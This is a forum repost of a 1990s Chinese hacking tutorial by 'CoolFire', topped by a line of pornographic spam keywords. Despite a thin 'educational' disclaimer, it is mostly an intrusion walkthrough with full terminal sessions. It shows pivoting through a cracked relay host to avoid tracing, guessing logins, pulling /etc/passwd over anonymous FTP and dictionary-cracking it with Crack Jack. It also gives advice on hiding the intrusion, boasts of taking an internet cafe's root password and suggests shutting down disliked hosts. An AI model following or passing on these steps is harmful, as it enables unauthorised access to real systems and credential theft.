久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

汶上信息港

標(biāo)題: 如何破解系統(tǒng)(1) [打印本頁(yè)]

作者: 雜七雜八 時(shí)間: 2011-1-12 16:25
標(biāo)題: 如何破解系統(tǒng)(1)
這不是一個(gè)教學(xué)文件, 只是告訴你該如何破解系統(tǒng), 好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護(hù), 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫(xiě)這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password 若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負(fù)責(zé) !!

#1 甚麼是 Hacking ?
就是入侵電腦! 有甚麼好解釋的! 大部份有關(guān)介紹 Hacker 的書(shū)籍或小說(shuō)及文件等都有清楚的介紹, 沉迷於電腦的人... 破壞... 唉! 一大堆怪解釋就是了, 最好不要成為一個(gè) "駭客", 我... 不是!

#2 為甚麼要 Hack ?
我們只是為了要了解更多關(guān)於系統(tǒng)的技術(shù), 入侵它, 了解它是如何運(yùn)作的, 試試它的安全性, 然後學(xué)著去使用它, 讀取系統(tǒng)中有關(guān)操作的說(shuō)明, 學(xué)習(xí)它的各項(xiàng)操作 !! 為了安全性而作革命!

#3 Hack 守則
1. 不惡意破壞任何的系統(tǒng), 這樣作只會(huì)給你帶來(lái)麻煩.
惡意破壞它人的軟體將導(dǎo)致法律刑責(zé), 如果你只是使用電腦, 那僅為非法使用!! 注意: 千萬(wàn)不要破壞別人的軟體或資料 !!
2. 不修改任何的系統(tǒng)檔, 如果你是為了要進(jìn)入系統(tǒng)而修改它, 請(qǐng)?jiān)诖鸬侥康尼釋⑺幕卦瓲?
3. 不要輕易的將你要 Hack 的站臺(tái)告訴你不信任的朋友.
4. 不要在 bbs 上談?wù)撃?Hack 的任何事情.
5. 在 Post 文章的時(shí)候不要使用真名.
6. 正在入侵的時(shí)候, 不要隨意離開(kāi)你的電腦.
7. 不要侵入或破壞政府機(jī)關(guān)的主機(jī).
8. 不在電話中談?wù)撃?Hack 的任何事情.
9. 將你的筆記放在安全的地方.
10. 想要成為 Hacker 就要真正的 Hacking, 讀遍所有有關(guān)系統(tǒng)安全或系統(tǒng)漏洞的文件 (英文快點(diǎn)學(xué)好)!
11. 已侵入電腦中的帳號(hào)不得清除或修改.
12. 不得修改系統(tǒng)檔案, 如果為了隱藏自己的侵入而作的修改則不在此限, 但仍須維持原來(lái)系統(tǒng)的安全性, 不得因得到系統(tǒng)的控制權(quán)而將門(mén)戶大開(kāi) !!
13. 不將你已破解的帳號(hào)分享與你的朋友.

#4 破解之道
1. 進(jìn)入主機(jī)中
2. 得到 /etc/passwd
3. 得到系統(tǒng)帳號(hào)
4. 得到最高權(quán)限

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
進(jìn)入主機(jī)有好幾種方式, 可以經(jīng)由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式進(jìn)入, 一臺(tái)主機(jī)雖然只有一個(gè)位址, 但是它可能同時(shí)進(jìn)行多項(xiàng)服務(wù), 所以如果你只是要 "進(jìn)入" 該主機(jī), 這些 Port 都是很好的進(jìn)行方向. 當(dāng)然還有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麼??? 我不知道, 你知道嗎?!

底下的示范并不是像寫(xiě)出來(lái)的那麼容易, 只不過(guò)是要讓你了解如何進(jìn)入, 當(dāng)然其中還有很多問(wèn)題, 如打錯(cuò)指令...... 等等的毛病... 沒(méi)有出現(xiàn)在課堂上, 但是我為了面子.... 一定要?jiǎng)h掉這些不堪入目的東西嘛...

示范進(jìn)入主機(jī)的方法: (By CoolFire)

(首先要先連上某一臺(tái)你已經(jīng)有帳號(hào)的 Telnet 主機(jī), 當(dāng)然最好是假的, 也就是 Crack過(guò)的主機(jī), 然後利用它來(lái) Crack 別的主機(jī), 才不會(huì)被別人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net ... 當(dāng)然是假的羅, 都已經(jīng)經(jīng)過(guò)修改了啦 !!沒(méi)有這一臺(tái)主機(jī)啦 !! 別怕 ! 別怕 ! 以下的主機(jī)名稱都是假的名稱, 請(qǐng)同學(xué)們要記得 !!)

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標(biāo)是......)

ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 試試看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(沒(méi)關(guān)系, 再來(lái) !!)
cool login: hinet
Password:
Login incorrect

cool login:

(都沒(méi)猜對(duì), 這邊用的是猜的方法, 今天運(yùn)氣好像不好)
telnet> close
Connection closed.

(重來(lái), 換個(gè) Port 試試看 !!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.

<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>

Invalid request "" (unknown method)

<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(哇哩 !! 連密碼都沒(méi)得輸入, 真是..... 再來(lái) !! 要有恒心 !!)
(換 FTP Port 試試)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(哇 ! 可以用 anonymous 進(jìn)來(lái)耶!! password 部份輸入 aaa@ 就好了 !
不要留下足跡喔!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(嗯嗯... 太好了 ! 進(jìn)來(lái)了 !! 下一個(gè)目標(biāo)是.....)

ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回來(lái) !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 這麼容易嗎??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(哇哩... 是 Shadow 的... 真是出師不利.... )

ftp> bye
221 Goodbye.

(不信邪.... 還是老話, 要有恒心....)
(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(又猜錯(cuò) !!)

cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.

Some programming languages manage to absorb change but withstand
progress.

cool:~$

(哇哈哈 !! 哪個(gè)笨 root, 用 system name 作 username 連
password 也是 system name.... 總算... 沒(méi)白玩...)

cool:~$ system
bash: system: command not found

(嗯... 這個(gè) user 的權(quán)限好像不大....)

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
(好想睡呀 !! 不玩了 !! 下節(jié)課再開(kāi)始....)
Connection closed.
ms.hinet.net> exit

(走了 !! 下節(jié)課在見(jiàn)啦 !! 今天就上到這里 ! 老師要先下班了 !!)
(有學(xué)生說(shuō): 騙人! 還沒(méi)有破解呀!! 胡說(shuō) ! 不是已經(jīng)進(jìn)來(lái)了嗎 ???
看看這節(jié)課上的是甚麼??? ---->進(jìn)入主機(jī) !! 嗯.....)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

上節(jié)課抓回來(lái)一個(gè) "亂七八糟" 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所抓回來(lái)的能是甚麼好東西?? 所以這一節(jié)課繼續(xù)上次的攻擊行動(dòng). 上節(jié)課我們已經(jīng) "猜" 到了一個(gè)不是 guest 的 username 及 password. 今天就以它來(lái)進(jìn)入主機(jī)瞧瞧!!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標(biāo)是.....呵...)

ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看.... 昨天的位址,
有作筆記吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

cool login: fuckyou
Password: (一樣輸入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.

cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@

(找尋目標(biāo)..... 太亂了 ! 懶得找, 再來(lái) ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd
(看看有沒(méi)有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正點(diǎn) ! 一點(diǎn)都沒(méi)有防備 !!)
cool:/etc$ exit
logout
(走了!.... 換 FTP 上場(chǎng) !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)
ftp> bye
221 Goodbye.
ms.hinet.net> exit

(閃人羅 !! 下課 !!.... 喔慢點(diǎn), 還有事要說(shuō)明......)

passwd 的 Shadow 就是把 passwd 放在 shadow 檔中, 而你原先在第一節(jié)課所看到的這個(gè)格式的 passwd 并不是真正的 passwd....

root::0:0:root:/root:/bin/bash

因?yàn)槊艽a的部份沒(méi)有東西.... 所以拿了也沒(méi)有用 !! 但這一節(jié)課所拿到的東西呢,像是這樣, 有幾點(diǎn)需要說(shuō)明的, 就是它究竟代表著甚麼???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成幾個(gè)欄位, 各欄位對(duì)照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

了了吧 ! 了了吧 ! 保留著你千辛萬(wàn)苦所拿到的 passwd, 咱們第三節(jié)課再來(lái)告訴各位如何使用 Crack Jack 把 passwd 解碼.... 呵呵...
zzZZzZzz...

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

Crack Jack V1.4 中文使用說(shuō)明 (By CoolFire 12-1-1996)

嗯... 該到第三課了 !! 累了的同學(xué)先去喝口水吧!

這一節(jié)課咱們來(lái)說(shuō)說(shuō) Crack Jack ! 這可是個(gè)解讀 /etc/passwd 的好工具喔,不要告訴我你習(xí)慣用Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包準(zhǔn)你馬上投向 Crack Jack 1.4的懷抱, 但請(qǐng)先確定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page
中拿到這個(gè)版本的 Crack Jack ! 這才是真正有用的版本, 速度... 對(duì)... 就是這點(diǎn)別人都比不上 !但還是要講講它的缺點(diǎn)... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上開(kāi)個(gè) DOS Mode 跑,它可是連理都不會(huì)理你的 !

OK! 現(xiàn)在切入正題 ! etc/passwd 拿到手了吧 !! 開(kāi)始羅 !! 使用 Crack Jack 1.4前所需要的東西有這些 [1] Crack Jack 1.4 (廢話...$%^&@@) [2] /etc/passwd 檔案, 你可以在 Unix
系統(tǒng)中的 /etc/ 目錄中找到 passwd [3] 字典檔 (哪里找, 自己敲... 呵 ClayMore 中有一份
DIC.TXT是有一千多個(gè)字的字典, 但比起我的字典可就小巫見(jiàn)大巫了, LetMeIn! 1.0 里面也有, 聽(tīng)James說(shuō) 2.0 Release 的時(shí)候會(huì)有更棒的字典檔含入, 期待吧!).... 使用 Crack Jack 1.4
前需先確定你所使用的機(jī)器是 386 含以上 CPU 的 ! 然後最好有充足的記憶體 !!

開(kāi)始 Jack 時(shí)只要敲入 JACK 即可, 它會(huì)問(wèn)你 PW Name... 輸入你的 passwd 檔名,Dictionary
Name 輸入你的字典檔名, Jack 就會(huì)開(kāi)始找了 ! 找到時(shí)會(huì)告訴你, 也會(huì)在 JACK.POT中寫(xiě)入它所找到的密碼 !! 但... 有點(diǎn)怪的格式! 如果找到的是具 root 權(quán)限的密碼, Jack 會(huì)告訴你
This is JackAss... 嗯...說(shuō)臟話了 !! 因?yàn)槭褂?Jack 占用的時(shí)間實(shí)在太多,如果你中途想要停掉時(shí)只要按下 Ctrl-C 即可, 別以為你前功盡棄了! 因?yàn)?Jack 有個(gè) Restore 的功能,中斷時(shí)會(huì)自動(dòng)存檔為 RESTORE, 下次要繼續(xù)這次的尋找只要輸入 Jack -Restore:RESTORE 即可 !!
當(dāng)然你也可以為你的 Restore 重新命名 ! Jack 也會(huì)找得到的 ... 如Renrestorerestore.HNT
之後要再尋找的時(shí)後就 Jack -Restore:RESTORE.HNT 即可... Jack 會(huì)很自動(dòng)的 Restore
前次所尋找的字串...繼續(xù)幫你找下去....

字典檔哪里找: 我的不給你! 可以找別的 Brute Force 之類的程式, 有些里面會(huì)附,或是找找其它的 Hacker 地下站看看有沒(méi)有, 自己編一個(gè), 或找個(gè)英漢字典軟體將字典的部份解出來(lái),
可能要有一點(diǎn)資料欄位及寫(xiě)程式的基礎(chǔ).

[這一節(jié)課沒(méi)有范例] 成功的案例: 找到過(guò)某家網(wǎng)路咖啡店的 root 權(quán)限密碼 ! Jack好正點(diǎn)呀 !!!所花的時(shí)間: 20 分鐘左右... 但也有找了一兩天也找不到的..... 嗚... 駭客們! 加油吧!!

------
最近比較沒(méi)空了 ! 因?yàn)橐s其它的報(bào)告, Home Page 也沒(méi)有太多時(shí)間整理,更別說(shuō)是寫(xiě)這些說(shuō)明了,但是太多網(wǎng)友需要, 我只好兩肋插刀... 差點(diǎn)昨天就交不出報(bào)告了 !!如果你有興趣寫(xiě)其它程式的中文說(shuō)明, 請(qǐng)完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,當(dāng)然你也可以給我你的使用心得, 讓別人參考看看也行! 另外 CoolFire 目前準(zhǔn)備收集一系列的System Hole List, 如果你在其它的站臺(tái)有看到的, 請(qǐng)把它先 Cut 下來(lái), Mail 一份給我 !這樣我才能弄出一份更齊全的東西呀.... 還有... 在想弄個(gè) Mail List... 唉.. 不想這麼多了! 有空再說(shuō)吧!

再次重申, Crack 別人站臺(tái)之後不要破壞別人站臺(tái)中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機(jī).... (當(dāng)然高-Net 除外, 我恨死它了)... 請(qǐng)勿將這類技術(shù)使用於破壞上
(又.....如果第三次世界大戰(zhàn)開(kāi)打, 你可以任意破壞敵國(guó)的電腦網(wǎng)路... 我全力支持),最嚴(yán)重的情況(如果你真的很討厭該主機(jī)的話)... 就將它 Shut Down.... 好了! 別太暴力了!

歡迎光臨汶上信息港 (http://m.junkejituan.com/)